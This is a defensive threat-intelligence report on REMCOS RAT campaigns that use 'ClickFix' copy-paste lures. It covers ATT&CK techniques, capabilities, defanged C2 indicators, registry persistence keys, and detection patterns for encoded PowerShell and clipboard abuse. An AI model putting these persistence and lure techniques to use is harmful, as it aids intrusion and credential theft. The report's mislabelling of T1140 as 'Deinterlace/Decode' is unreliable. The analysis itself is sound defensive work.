Full Report
Cybereason GSOC has observed a notable increase in infections involving REMCOS RAT, often delivered through vulnerable or potentially unwanted applications (PUAs).
Analysis Summary
# Tool/Technique: REMCOS RAT (ClickFix Delivery)
## Overview
REMCOS (Remote Control and Surveillance) is a sophisticated Remote Access Trojan (RAT) originally marketed as a legitimate remote administration tool. Recent campaigns observed by Cybereason GSOC highlight a surge in infections utilizing "ClickFix" social engineering tactics. Attackers lure users into executing malicious scripts disguised as "fixes" for browser errors or software issues, eventually deploying REMCOS through vulnerable or Potentially Unwanted Applications (PUAs).
## Technical Details
- **Type:** Malware Family (Remote Access Trojan)
- **Platform:** Windows
- **Capabilities:** Remote surveillance, data exfiltration, system control, and persistence.
- **First Seen:** Approximately 2016 (Initial release); ClickFix variant observed in late 2024.
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1566.002 - Phishing: Spearphishing Link]
- **[TA0002 - Execution]**
- [T1204.002 - User Execution: Malicious File]
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- **[TA0003 - Persistence]**
- [T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder]
- **[TA0005 - Defense Evasion]**
- [T1562.001 - Impair Defenses: Disable or Modify Tools]
- [T1140 - Deinterlace/Decode Files or Information]
- **[TA0009 - Collection]**
- [T1113 - Screen Capturing]
- [T1056.001 - Input Capture: Keylogging]
- **[TA0011 - Command and Control]**
- [T1071.001 - Application Layer Protocol: Web Protocols]
## Functionality
### Core Capabilities
- **Remote Administration:** Full control over the file system, processes, and services.
- **Surveillance:** Real-time monitoring via screen capture (screenshots) and webcam access.
- **Information Stealing:** Keylogging to capture credentials and sensitive inputs.
- **File Management:** Capability to upload, download, and execute additional payloads.
### Advanced Features
- **Social Engineering Tooling:** Integration with "ClickFix" lures that trick users into copying/pasting PowerShell commands into their terminal under the guise of fixing browser rendering issues.
- **Bypass Techniques:** Exploitation of PUAs to mask malicious activity and bypass traditional security perimeters.
- **Encrypted C2:** Communication with command-and-control servers using custom encryption to evade network detection.
## Indicators of Compromise
- **File Hashes (Examples):**
- *Note: Specific hashes vary by campaign; check latest threat feeds for specific REMCOS samples.*
- **File Names:** `Remcos.exe`, `install.bat`, various obfuscated `.ps1` or `.vbs` scripts.
- **Registry Keys:**
- `HKEY_CURRENT_USER\Software\Remcos`
- `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` (for persistence)
- **Network Indicators:**
- `94[.]156[.]174[.]228` (Example C2 IP)
- `remcos[.]biz` (Domain)
- `geoplugin[.]net` (Used for IP geolocation)
- **Behavioral Indicators:**
- Unexpected PowerShell execution with Base64 encoded commands.
- Scripts utilizing `clip.exe` to manipulate or read clipboard data.
- Unauthorized modification of Windows Defender exclusion lists.
## Associated Threat Actors
- **UAC-0050:** Known for frequent use of REMCOS in various campaigns.
- **Generic Cybercriminals:** Due to its "Malware-as-a-Service" availability, it is used by a wide array of financially motivated actors.
## Detection Methods
- **Signature-based:** Antivirus detection for known REMCOS stubs and the "BreakingSecurity" digital signatures.
- **Behavioral Detection:** Monitoring for suspicious PowerShell activity, specifically the combination of `Invoke-Expression` (IEX) and clipboard access.
- **YARA Rules:** Target the unique strings in the REMCOS communication protocol and the specific RC4 decryption keys often used in its configuration block.
## Mitigation Strategies
- **User Training:** Educate employees to never copy-paste commands from websites into a terminal (the "ClickFix" lure).
- **Process Restrictions:** Disable or strictly monitor the use of PowerShell and Command Prompt for non-administrative users.
- **Application Whitelisting:** Prevent the execution of unauthorized Remote Access Tools and PUAs.
- **Network Segmentation:** Limit outbound traffic to known-good domains and block common C2 ports.
## Related Tools/Techniques
- **AsyncRAT:** Similar .NET-based RAT often delivered via similar methods.
- **Agent Tesla:** Frequently seen alongside REMCOS for credential harvesting.
- **ClickFix:** A burgeoning social engineering technique targeting browser-based "fixes."